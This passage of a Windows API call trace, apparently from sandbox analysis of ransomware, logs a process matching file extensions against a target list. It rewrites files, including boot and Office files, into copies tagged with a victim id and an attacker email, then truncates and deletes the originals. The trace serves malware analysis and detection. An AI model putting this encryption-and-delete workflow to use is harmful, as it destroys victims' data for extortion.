(lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.262] lstrlenW (lpString=".zip") returned 4 [0048.262] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.262] lstrlenW (lpString=".rar") returned 4 [0048.262] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.262] lstrlenW (lpString=".bz2") returned 4 [0048.262] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.262] lstrlenW (lpString=".7z") returned 3 [0048.262] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.262] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.262] lstrlenW (lpString=".dbf") returned 4 [0048.262] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.262] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.262] lstrlenW (lpString=".1cd") returned 4 [0048.262] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.262] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.262] lstrlenW (lpString=".jpg") returned 4 [0048.262] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.262] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.263] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.263] lstrlenW (lpString=".doc") returned 4 [0048.263] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0048.263] lstrlenW (lpString=".docx") returned 5 [0048.263] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0048.263] lstrlenW (lpString=".pdf") returned 4 [0048.263] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0048.263] lstrlenW (lpString=".xls") returned 4 [0048.263] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0048.263] lstrlenW (lpString=".xlsx") returned 5 [0048.263] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0048.263] lstrlenW (lpString=".ppt") returned 4 [0048.263] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0048.263] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.263] lstrlenW (lpString=".zip") returned 4 [0048.263] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0048.263] lstrlenW (lpString=".rar") returned 4 [0048.263] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0048.263] lstrlenW (lpString=".bz2") returned 4 [0048.263] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0048.263] lstrlenW (lpString=".7z") returned 3 [0048.263] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0048.263] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.263] lstrlenW (lpString=".dbf") returned 4 [0048.263] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0048.263] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.263] lstrlenW (lpString=".1cd") returned 4 [0048.263] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0048.263] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0048.263] lstrlenW (lpString=".jpg") returned 4 [0048.263] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0048.264] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0048.264] lstrlenW (lpString="UiInfo.xml") returned 10 [0048.264] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0048.264] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=38898) returned 1 [0048.264] CloseHandle (hObject=0x300) returned 1 [0048.264] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml")) returned 0x80 [0048.264] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.264] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0048.264] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0048.264] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0048.264] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0048.265] GetLastError () returned 0x0 [0048.265] ReadFile (in: hFile=0x300, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x97f2, lpOverlapped=0x0) returned 1 [0049.456] WriteFile (in: hFile=0x2e4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x9800, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x9800, lpOverlapped=0x0) returned 1 [0049.458] ReadFile (in: hFile=0x300, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0049.458] WriteFile (in: hFile=0x2e4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe8, lpOverlapped=0x0) returned 1 [0049.458] SetEndOfFile (hFile=0x2e4) returned 1 [0049.458] CloseHandle (hObject=0x2e4) returned 1 [0049.460] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0049.460] SetEndOfFile (hFile=0x300) returned 1 [0049.461] CloseHandle (hObject=0x300) returned 1 [0049.461] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0049.462] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml")) returned 1 [0049.462] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.462] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.462] lstrlenW (lpString=".doc") returned 4 [0049.462] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0049.462] lstrlenW (lpString=".docx") returned 5 [0049.462] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0049.462] lstrlenW (lpString=".pdf") returned 4 [0049.462] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0049.462] lstrlenW (lpString=".xls") returned 4 [0049.462] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0049.462] lstrlenW (lpString=".xlsx") returned 5 [0049.462] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0049.462] lstrlenW (lpString=".ppt") returned 4 [0049.462] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0049.463] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.463] lstrlenW (lpString=".zip") returned 4 [0049.463] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0049.463] lstrlenW (lpString=".rar") returned 4 [0049.463] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0049.463] lstrlenW (lpString=".bz2") returned 4 [0049.463] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0049.463] lstrlenW (lpString=".7z") returned 3 [0049.463] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0049.463] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.463] lstrlenW (lpString=".dbf") returned 4 [0049.463] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0049.463] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.463] lstrlenW (lpString=".1cd") returned 4 [0049.463] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0049.463] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.463] lstrlenW (lpString=".jpg") returned 4 [0049.463] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0049.463] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.463] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.463] lstrlenW (lpString=".doc") returned 4 [0049.463] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0049.463] lstrlenW (lpString=".docx") returned 5 [0049.463] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0049.463] lstrlenW (lpString=".pdf") returned 4 [0049.463] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0049.463] lstrlenW (lpString=".xls") returned 4 [0049.463] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0049.464] lstrlenW (lpString=".xlsx") returned 5 [0049.464] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0049.464] lstrlenW (lpString=".ppt") returned 4 [0049.464] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0049.464] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.464] lstrlenW (lpString=".zip") returned 4 [0049.464] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0049.464] lstrlenW (lpString=".rar") returned 4 [0049.464] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0049.464] lstrlenW (lpString=".bz2") returned 4 [0049.464] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0049.464] lstrlenW (lpString=".7z") returned 3 [0049.464] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0049.464] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.464] lstrlenW (lpString=".dbf") returned 4 [0049.464] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0049.464] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.464] lstrlenW (lpString=".1cd") returned 4 [0049.464] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0049.464] lstrlenW (lpString="C:\\588bce7c90097ed212\\UiInfo.xml") returned 32 [0049.464] lstrlenW (lpString=".jpg") returned 4 [0049.464] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0049.464] lstrcmpiW (lpString1=".LOG", lpString2=".bat") returned 1 [0049.465] lstrlenW (lpString="BCD.LOG") returned 7 [0049.465] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.465] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.465] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.465] lstrlenW (lpString=".doc") returned 4 [0049.465] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0049.466] lstrlenW (lpString=".docx") returned 5 [0049.466] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0049.466] lstrlenW (lpString=".pdf") returned 4 [0049.466] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0049.466] lstrlenW (lpString=".xls") returned 4 [0049.466] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0049.466] lstrlenW (lpString=".xlsx") returned 5 [0049.466] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0049.466] lstrlenW (lpString=".ppt") returned 4 [0049.466] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0049.466] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.466] lstrlenW (lpString=".zip") returned 4 [0049.466] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0049.466] lstrlenW (lpString=".rar") returned 4 [0049.467] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0049.467] lstrlenW (lpString=".bz2") returned 4 [0049.467] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0049.467] lstrlenW (lpString=".7z") returned 3 [0049.467] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0049.467] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.467] lstrlenW (lpString=".dbf") returned 4 [0049.467] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0049.467] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.467] lstrlenW (lpString=".1cd") returned 4 [0049.467] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0049.467] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.467] lstrlenW (lpString=".jpg") returned 4 [0049.467] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0049.467] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.467] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.467] lstrlenW (lpString=".doc") returned 4 [0049.467] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0049.467] lstrlenW (lpString=".docx") returned 5 [0049.467] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0049.467] lstrlenW (lpString=".pdf") returned 4 [0049.467] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0049.467] lstrlenW (lpString=".xls") returned 4 [0049.467] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0049.467] lstrlenW (lpString=".xlsx") returned 5 [0049.467] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0049.467] lstrlenW (lpString=".ppt") returned 4 [0049.467] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0049.467] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.467] lstrlenW (lpString=".zip") returned 4 [0049.467] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0049.467] lstrlenW (lpString=".rar") returned 4 [0049.467] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0049.467] lstrlenW (lpString=".bz2") returned 4 [0049.468] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0049.468] lstrlenW (lpString=".7z") returned 3 [0049.468] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0049.468] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.468] lstrlenW (lpString=".dbf") returned 4 [0049.468] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0049.468] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.468] lstrlenW (lpString=".1cd") returned 4 [0049.468] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0049.468] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0049.468] lstrlenW (lpString=".jpg") returned 4 [0049.468] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0049.469] lstrcmpiW (lpString1=".DAT", lpString2=".bat") returned 1 [0049.469] lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0049.469] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0054.004] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=65536) returned 1 [0054.004] CloseHandle (hObject=0x324) returned 1 [0054.004] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0054.004] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bootstat.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0054.004] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0054.004] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0054.004] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0054.004] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bootstat.dat.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0054.005] GetLastError () returned 0x0 [0054.005] ReadFile (in: hFile=0x324, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x10000, lpOverlapped=0x0) returned 1 [0054.008] WriteFile (in: hFile=0x2d4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x10010, lpOverlapped=0x0) returned 1 [0054.009] ReadFile (in: hFile=0x324, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0054.009] WriteFile (in: hFile=0x2d4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0054.009] SetEndOfFile (hFile=0x2d4) returned 1 [0054.009] CloseHandle (hObject=0x2d4) returned 1 [0054.011] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0054.011] SetEndOfFile (hFile=0x324) returned 1 [0054.012] CloseHandle (hObject=0x324) returned 1 [0054.012] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x26) returned 1 [0054.012] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0054.013] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.013] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.013] lstrlenW (lpString=".doc") returned 4 [0054.013] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0054.013] lstrlenW (lpString=".docx") returned 5 [0054.013] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0054.013] lstrlenW (lpString=".pdf") returned 4 [0054.013] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0054.013] lstrlenW (lpString=".xls") returned 4 [0054.013] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0054.013] lstrlenW (lpString=".xlsx") returned 5 [0054.013] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0054.013] lstrlenW (lpString=".ppt") returned 4 [0054.013] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0054.013] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.013] lstrlenW (lpString=".zip") returned 4 [0054.013] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0054.013] lstrlenW (lpString=".rar") returned 4 [0054.013] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0054.013] lstrlenW (lpString=".bz2") returned 4 [0054.013] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0054.013] lstrlenW (lpString=".7z") returned 3 [0054.013] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0054.013] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.013] lstrlenW (lpString=".dbf") returned 4 [0054.013] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0054.013] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.013] lstrlenW (lpString=".1cd") returned 4 [0054.013] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0054.013] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.013] lstrlenW (lpString=".jpg") returned 4 [0054.013] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0054.014] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.014] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.014] lstrlenW (lpString=".doc") returned 4 [0054.014] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0054.014] lstrlenW (lpString=".docx") returned 5 [0054.014] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0054.014] lstrlenW (lpString=".pdf") returned 4 [0054.014] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0054.014] lstrlenW (lpString=".xls") returned 4 [0054.014] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0054.014] lstrlenW (lpString=".xlsx") returned 5 [0054.014] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0054.014] lstrlenW (lpString=".ppt") returned 4 [0054.014] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0054.014] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.014] lstrlenW (lpString=".zip") returned 4 [0054.014] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0054.014] lstrlenW (lpString=".rar") returned 4 [0054.014] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0054.014] lstrlenW (lpString=".bz2") returned 4 [0054.014] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0054.014] lstrlenW (lpString=".7z") returned 3 [0054.014] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0054.014] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.014] lstrlenW (lpString=".dbf") returned 4 [0054.014] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0054.014] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.014] lstrlenW (lpString=".1cd") returned 4 [0054.014] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0054.014] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0054.014] lstrlenW (lpString=".jpg") returned 4 [0054.014] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0054.014] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0054.015] lstrlenW (lpString="OfficeUpdateSchedule.xml") returned 24 [0054.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0054.016] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=4782) returned 1 [0054.016] CloseHandle (hObject=0x324) returned 1 [0054.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 0x20 [0054.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0054.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0054.016] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0054.016] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0054.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0054.017] GetLastError () returned 0x0 [0054.017] ReadFile (in: hFile=0x324, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x12ae, lpOverlapped=0x0) returned 1 [0054.587] WriteFile (in: hFile=0x2d4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x12b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x12b0, lpOverlapped=0x0) returned 1 [0054.587] ReadFile (in: hFile=0x324, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0054.587] WriteFile (in: hFile=0x2d4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x104, lpOverlapped=0x0) returned 1 [0054.588] SetEndOfFile (hFile=0x2d4) returned 1 [0055.385] CloseHandle (hObject=0x2d4) returned 1 [0055.386] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, 